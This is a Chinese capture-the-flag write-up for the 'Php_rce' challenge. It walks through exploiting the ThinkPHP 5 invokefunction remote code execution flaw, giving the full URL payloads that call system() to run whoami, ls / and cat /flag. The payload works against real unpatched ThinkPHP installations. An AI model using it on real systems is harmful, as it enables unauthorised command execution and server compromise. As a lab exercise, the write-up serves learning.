攻防世界-Php_rce-胎教版wp

前言

  • 考点:
    • ThinkPHP V5(尤其是 5.0/5.1 非 LTS 版本)因历史设计缺陷和早期版本安全防护不足,存在多个高危远程代码执行(RCE)漏洞,是黑客批量攻击的重点目标,其中以5.0.x 远程代码执行漏洞和5.1.x 方法名可控代码执行漏洞最为典型、危害最大
    • 对于本题我们可以先搜索了解这个漏洞,找到漏洞测试和利用方法,在进行实践

解题步骤:

  • 1.进入环境,我们看到页面提示,ThinkPHP V5

    我们点击"七牛云",进入一个网址,但并没有什么有用信息
  • 2.我们先搜索了解这个漏洞,猜测本题存在ThinkPHP5 版本框架的漏洞,于是查找这个漏洞框架的利用方法
  • 3.我们进行测试,输入:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1,若页面返回PHPINFO 信息(PHP 版本、配置等),说明存在该漏洞,页面输出了PHP信息(这里截取了一部分),证明存在该漏洞
  • 4.我们再将phpinfo改成其他命令执行函数,输入:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami,得到页面回显
  • 5.我们将whoami改成ls /,即输入?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /,得到

    证明根目录下存在flag
  • 6.我们再将ls /改成cat /flag,即输入?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag,得到flag
相关推荐
泯泷15 小时前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷15 小时前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
Flynt5 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
冬奇Lab9 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
两个人的幸福11 天前
Windows 桌面应用自研 PHP 队列(下):完整代码与六大工程化优化
php
Aphasia31113 天前
VPN 与内网穿透
安全
BingoGo13 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
JaguarJack13 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
用户30745969820714 天前
PHP 扩展——从入门到理解
php
Mr_愚人派14 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全